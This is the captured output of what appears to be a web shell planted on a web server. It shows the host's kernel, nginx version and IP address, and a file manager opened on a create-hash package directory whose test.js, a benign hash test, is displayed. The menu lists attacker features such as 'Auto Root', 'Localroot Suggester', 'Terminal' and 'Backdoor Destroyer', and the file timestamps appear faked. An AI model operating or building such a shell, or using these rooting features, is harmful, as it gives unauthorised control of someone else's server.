Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.217.230.80
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
create-hash /
Delete
Unzip
Name
Size
Permission
Date
Action
.travis.yml
247
B
-rw-r--r--
1985-10-26 08:15
LICENSE
1.07
KB
-rw-r--r--
1985-10-26 08:15
README.md
688
B
-rw-r--r--
1985-10-26 08:15
browser.js
625
B
-rw-r--r--
1985-10-26 08:15
index.js
46
B
-rw-r--r--
1985-10-26 08:15
md5.js
111
B
-rw-r--r--
1985-10-26 08:15
package.json
1.8
KB
-rw-r--r--
2021-02-04 21:24
test.js
1.43
KB
-rw-r--r--
1985-10-26 08:15
Save
Rename
var test = require('tape') var Buffer = require('safe-buffer').Buffer var algorithms = ['sha1', 'sha224', 'sha256', 'sha384', 'sha512', 'md5', 'rmd160', 'ripemd160'] var encodings = ['hex', 'base64'] // ignore binary var vectors = require('hash-test-vectors') vectors.forEach(function (vector) { vector.ripemd160 = vector.rmd160 }) var createHash = require('./browser') algorithms.forEach(function (algorithm) { test('test ' + algorithm + ' against test vectors', function (t) { vectors.forEach(function (obj, i) { var input = Buffer.from(obj.input, 'base64') var node = obj[algorithm] var js = createHash(algorithm).update(input).digest('hex') t.equal(js, node, algorithm + '(testVector[' + i + ']) == ' + node) }) encodings.forEach(function (encoding) { vectors.forEach(function (obj, i) { var input = Buffer.from(obj.input, 'base64').toString(encoding) var node = obj[algorithm] var js = createHash(algorithm).update(input, encoding).digest('hex') t.equal(js, node, algorithm + '(testVector[' + i + '], ' + encoding + ') == ' + node) }) }) vectors.forEach(function (obj, i) { var input = Buffer.from(obj.input, 'base64') var node = obj[algorithm] var hash = createHash(algorithm) hash.end(input) var js = hash.read().toString('hex') t.equal(js, node, algorithm + '(testVector[' + i + ']) == ' + node) }) t.end() }) })